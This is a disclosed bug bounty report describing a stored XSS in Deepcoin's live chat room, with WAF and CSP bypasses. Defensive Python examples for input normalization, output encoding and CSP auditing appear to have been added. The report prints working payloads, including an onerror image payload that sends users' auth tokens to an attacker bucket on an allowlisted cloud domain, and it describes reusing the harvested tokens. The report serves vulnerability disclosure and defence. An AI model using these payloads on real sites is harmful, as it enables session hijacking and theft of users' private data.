Deepcoin Disclosed Report

Bug bounty report Deepcoin Web & Mobile

Stored XSS + WAF Bypass + CSP Bypass, leading to Auth token and private data leakage

Company
Created date: May 14 2023

Target

https://www.deepcoin.com/

Vulnerability Details

During testing of the Chat Rooms functionality, I discovered that it is still possible to inject malicious payloads by crafting a special exploit that combines encoding with loading scripts from third-party resources, meaning that Deepcoin users are still at significant risk of being attacked by malicious users.

To start with, I discovered that your custom WAF solution can be easily bypassed by manipulating letter case and encoding some of the blacklisted parameters with ASCII encoding. Keeping this in mind, I crafted a payload that completely bypasses the WAF blacklist and allows alerting the Auth token from localStorage. Here's an example of a working payload:

<form><button formaction=jAvasCript:alert(localStorage.getItem('token'))>click
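As an added illustration (not part of the original report or of Deepcoin's code), the following Python shows why a literal, case-sensitive keyword blacklist is a weak control against the payload above, what a filter must at least do before matching (decode and case-fold the input), and the actual fix: HTML-encoding untrusted chat text at output so the markup is inert regardless of what the filter missed. The blacklist, the example policy and the test inputs are constructed for this example.

```python
import html
import re
from urllib.parse import unquote

# Constructed stand-in for a keyword blacklist of the kind the report
# describes: it matches literally, and only in lower case.
NAIVE_BLACKLIST = ("javascript:", "onerror=", "<script")


def naive_waf_blocks(message: str) -> bool:
    """Literal, case-sensitive match: the report's mixed-case payload slips through."""
    return any(token in message for token in NAIVE_BLACKLIST)


def normalize(message: str) -> str:
    """Undo the encodings a sender can layer on before any pattern check.

    Repeated URL-decoding and HTML-entity decoding (e.g. &#106; -> 'j'),
    followed by whitespace removal and case-folding, gives the matcher a
    canonical form. Looping until the value stops changing handles
    double-encoded input.
    """
    prev = None
    cur = message
    while cur != prev:
        prev = cur
        cur = html.unescape(unquote(cur))
    return re.sub(r"\s+", "", cur).casefold()


def normalized_waf_blocks(message: str) -> bool:
    """Same blacklist, applied to the canonical form of the message."""
    return any(token in normalize(message) for token in NAIVE_BLACKLIST)


def render_chat_message(message: str) -> str:
    """The real fix: context-aware output encoding.

    Untrusted chat text is HTML-escaped when inserted into element content,
    so '<', '>' and quotes can never open a tag or an attribute, whatever
    case or encoding the sender used.
    """
    return f'<li class="msg">{html.escape(message, quote=True)}</li>'


# Payload quoted from the report, used here as constructed test input.
REPORT_PAYLOAD = (
    "<form><button formaction=jAvasCript:alert(localStorage.getItem('token'))>click"
)

if __name__ == "__main__":
    print("naive filter blocks report payload:", naive_waf_blocks(REPORT_PAYLOAD))
    print("normalized filter blocks it:       ", normalized_waf_blocks(REPORT_PAYLOAD))
    print("rendered safely as:", render_chat_message(REPORT_PAYLOAD))
```

Even the normalized blacklist is still a denylist and will miss constructions it has no keyword for; it belongs in front of the application as a tripwire, not as the control. The chat renderer's output encoding (or, for rich-text chat, an allowlist-based sanitizer) is what actually stops stored XSS.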

After discovering how the WAF can be bypassed, I started analyzing the CSP header and, after some time, found that the CSP is vulnerable and can be easily bypassed by setting up storage buckets on the following allowlisted resources:

  • *.oss-accelerate.aliyuncs.com
  • *.s3.ap-northeast-1.amazonaws.com
  • *.s3.ap-southeast-1.amazonaws.com

After that, I created a custom S3 bucket service in the Germany (Frankfurt) region with "Transfer Acceleration" enabled, which made my instance accessible on the *.oss-accelerate.aliyuncs.com domain. That domain is allowed by the CSP header, so I could load my custom scripts and images into the Deepcoin application.
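The weakness here is a wildcard host in the policy on a multi-tenant storage service: `*.oss-accelerate.aliyuncs.com` allows every bucket of every customer, not just the site's own. As an added example (not part of the report and not Deepcoin's actual policy), the following Python parses a Content-Security-Policy header value and flags, in the directives that load scripts or images, wildcard entries on shared-tenant storage hosts and bare `*` sources. The three report hosts are included; the other suffixes, the weak and hardened policies, and the `deepcoin-assets-EXAMPLE` bucket name are constructed placeholders.

```python
from typing import Dict, List

# Constructed list of shared-tenant object-storage hosts: anyone can create a
# bucket there, so a wildcard on the host allowlists every tenant. The first
# three are the hosts named in the report; the rest are assumed examples of
# the same class.
SHARED_TENANT_SUFFIXES = (
    "oss-accelerate.aliyuncs.com",
    "s3.ap-northeast-1.amazonaws.com",
    "s3.ap-southeast-1.amazonaws.com",
    "s3.amazonaws.com",
    "storage.googleapis.com",
    "blob.core.windows.net",
)

# Directives that govern script execution and the image/fetch requests an
# injected <img> or fetch() would use to carry data out.
AUDITED_DIRECTIVES = ("default-src", "script-src", "img-src", "connect-src")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a CSP header value into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for raw in header.split(";"):
        parts = raw.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def host_of(source: str) -> str:
    """Reduce a host-source expression to its host part, lower-cased.

    'https://*.example.com/path' -> '*.example.com'; keywords such as
    "'self'" pass through unchanged and never match a host check.
    """
    s = source
    if "://" in s:
        s = s.split("://", 1)[1]
    return s.split("/", 1)[0].lower()


def audit_csp(header: str) -> List[str]:
    """Return one finding per over-broad source in the audited directives."""
    findings: List[str] = []
    policy = parse_csp(header)
    for directive in AUDITED_DIRECTIVES:
        for source in policy.get(directive, []):
            host = host_of(source)
            if host == "*":
                findings.append(f"{directive}: '*' allows any origin")
                continue
            if not host.startswith("*."):
                continue
            base = host[2:]
            for suffix in SHARED_TENANT_SUFFIXES:
                if base == suffix or base.endswith("." + suffix):
                    findings.append(
                        f"{directive}: {source} allows any tenant of {suffix}"
                    )
                    break
    return findings


# Constructed policies: a weak one of the shape the report describes, and a
# hardened one that names only the site's own (placeholder) bucket.
WEAK_POLICY = (
    "default-src 'self'; "
    "script-src 'self' https://*.oss-accelerate.aliyuncs.com "
    "https://*.s3.ap-northeast-1.amazonaws.com "
    "https://*.s3.ap-southeast-1.amazonaws.com; "
    "img-src *"
)
HARDENED_POLICY = (
    "default-src 'self'; "
    "script-src 'self' https://deepcoin-assets-EXAMPLE.oss-accelerate.aliyuncs.com; "
    "img-src 'self'"
)

if __name__ == "__main__":
    for line in audit_csp(WEAK_POLICY):
        print("WEAK    :", line)
    print("HARDENED:", audit_csp(HARDENED_POLICY) or "no findings")
```

The `img-src` check matters as much as `script-src`: the report's exfiltration path is an image request carrying the token in the query string, and a policy that pins scripts but leaves images open still lets that beacon out. A token kept in localStorage is readable by any script that runs in the origin, so the CSP is only defense in depth behind the output encoding in the chat renderer.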

Then, I hosted an HTML file containing <h1>Hello</h1> and set it up as a static page served from my instance at the dasdasdads.oss-accelerate.aliyuncs.com subdomain. This allowed me to collect the access log for the file hosted on my custom bucket. With that in place, I crafted a special payload using an <img> HTML tag which continuously attempts to load an image in the Deepcoin Live Chat Room, appending the localStorage token object to the GET request as a URI parameter. The following payload bypasses your custom WAF solution and the implemented CSP security measure by hosting my app on a trusted domain:

"><iMg sRc=x oNerRor=this.src='https://dasdasdads.oss-accelerate.aliyuncs.com/?'+JSON.stringify(localStorage.getItem('token'));>

Finally, after the payload was crafted and debugged, and logging was enabled on my bucket instance, I successfully injected it into the Deepcoin Live Chat Room.

As you can see, it started generating a massive number of requests to my resource, each containing the Auth token from localStorage:

After that, all I had to do was exfiltrate the Auth token from my bucket's access log:

As you can see from the attached screenshot, Auth tokens were successfully attached to the request and logged by my bucket service; they can be seen after the /?%22 URI value. Here's the part of the log I collected, containing about 50,000 lines.

Besides that, with this attack it's possible to exfiltrate not only Auth tokens but also private information such as users' IP addresses, emails, phone numbers, country, UID and much more, as all of it is stored in localStorage.

To prove the severity of this issue, I'm providing a screenshot from the Deepcoin API endpoint where the retrieved token is used as the Authentication header, meaning that all retrieved tokens can be reused, since according to my investigation the session stays alive for several days.

To finalize my report: all Deepcoin users who visit the Deepcoin Live Chat Room are affected by this vulnerability, as all their data can be easily stolen without any interaction; all they need to do is load the chat room page.

Validation steps

All required steps are described in the part below.

Details
State: disclosed
Severity: Critical
Bounty: $0
Visibility: partially
Vulnerability: Cross-site Scripting (XSS) - Stored
Participants (3): company admin, triage team, author